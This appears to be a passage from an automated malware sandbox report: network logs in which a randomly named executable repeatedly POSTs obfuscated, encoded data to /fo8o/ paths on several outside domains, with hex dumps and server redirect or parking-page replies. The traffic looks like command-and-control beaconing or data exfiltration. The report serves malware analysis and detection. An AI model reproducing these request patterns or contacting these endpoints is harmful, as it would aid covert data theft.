            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f
            Data Ascii: blWd=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
            Aug 2, 2024 13:53:19.593957901 CEST1070INHTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:19 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            38192.168.2.649768217.196.55.202805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:21.558305979 CEST816OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d
            Data Ascii: blWd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
            Aug 2, 2024 13:53:22.142978907 CEST1070INHTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:22 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            39192.168.2.649769217.196.55.202805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:24.099364042 CEST1829OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 58 65 56 [TRUNCATED]
            Data Ascii: blWd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y09Kpc [TRUNCATED]
            Aug 2, 2024 13:53:24.672560930 CEST1070INHTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:24 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            40192.168.2.649770217.196.55.202805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:26.630445004 CEST528OUTGET /fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.empowermedeco.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:27.259416103 CEST1230INHTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:27 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            41192.168.2.664509199.59.243.226805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:35.339806080 CEST771OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 45 57 36 79 7a 36 52 78 51 76 48 46 58 6a 46 4b 4e 55 49 66 68 37 2f 79 57 39 34 37 56 52 50 48 53 69 6e 73 73 69 62 2f 32 37 64 54 71 54 55 46 74 70 4d 36 76 53 76 45 4b 58 50 38 6d 75 7a 61 66 43 38 36 38 77 6c 53 72 36 62 49 6f 34 5a 69 36 77 4e 34 34 6b 67 39 6c 49 51 71 73 6e 71 65 71 6e 63 63 73 68 52 4c 42 78 38 69 5a 76 55 61 37 4f 5a 61 59 4a 42 36 31 53 72 35 63 76 46 37 46 45 4b 47 59 73 5a 51 56 44 38 48 6c 76 71 42 59 70 2b 69 48 56 4e 49 46 54 72 63 45 6d 6a 56 79 53 63 2f 58 76 39 66 55 57 30 68 64 42 67 50 43 49 32 7a 79 30 65 53 2b 7a 4e 30 44 55 70 42
            Data Ascii: blWd=1hBK8uCOn0O6EW6yz6RxQvHFXjFKNUIfh7/yW947VRPHSinssib/27dTqTUFtpM6vSvEKXP8muzafC868wlSr6bIo4Zi6wN44kg9lIQqsnqeqnccshRLBx8iZvUa7OZaYJB61Sr5cvF7FEKGYsZQVD8HlvqBYp+iHVNIFTrcEmjVySc/Xv9fUW0hdBgPCI2zy0eS+zN0DUpB
            Aug 2, 2024 13:53:35.868133068 CEST1236INHTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:34 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: f0818423-dd2c-443d-8e56-a14554145f15
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=f0818423-dd2c-443d-8e56-a14554145f15; expires=Fri, 02 Aug 2024 12:08:35 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:35.868191957 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjA4MTg0MjMtZGQyYy00NDNkLThlNTYtYTE0NTU0MTQ1ZjE1IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            42192.168.2.664510199.59.243.226805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:37.881253004 CEST795OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 58 48 54 41 2f 73 74 6a 62 2f 78 37 64 54 79 6a 55 45 67 4a 4d 7a 76 53 54 4d 4b 58 7a 38 6d 75 33 61 66 44 4d 36 38 6a 4e 52 71 71 62 4f 6a 59 5a 67 6e 41 4e 34 34 6b 67 39 6c 49 46 2f 73 6e 43 65 70 54 67 63 74 45 74 49 66 68 38 68 51 50 55 61 77 75 5a 65 59 4a 42 55 31 54 6e 54 63 70 4a 37 46 42 4f 47 59 39 5a 54 4d 7a 38 42 76 50 72 57 62 71 75 74 48 7a 59 6e 4b 79 72 37 66 55 54 74 36 45 64 6c 4c 63 39 38 47 47 55 6a 64 44 34 39 43 6f 32 5a 77 30 6d 53 73 6b 42 54 4d 67 4d 69 72 47 56 79 75 4e 65 50 47 70 78 34 38 63 7a 76 54 65 37 62 76 67 3d 3d
            Data Ascii: blWd=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEXHTA/stjb/x7dTyjUEgJMzvSTMKXz8mu3afDM68jNRqqbOjYZgnAN44kg9lIF/snCepTgctEtIfh8hQPUawuZeYJBU1TnTcpJ7FBOGY9ZTMz8BvPrWbqutHzYnKyr7fUTt6EdlLc98GGUjdD49Co2Zw0mSskBTMgMirGVyuNePGpx48czvTe7bvg==
            Aug 2, 2024 13:53:38.363174915 CEST1236INHTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:37 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: aa032d9c-4cae-49a1-8aa5-edea1cc5aeb7
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
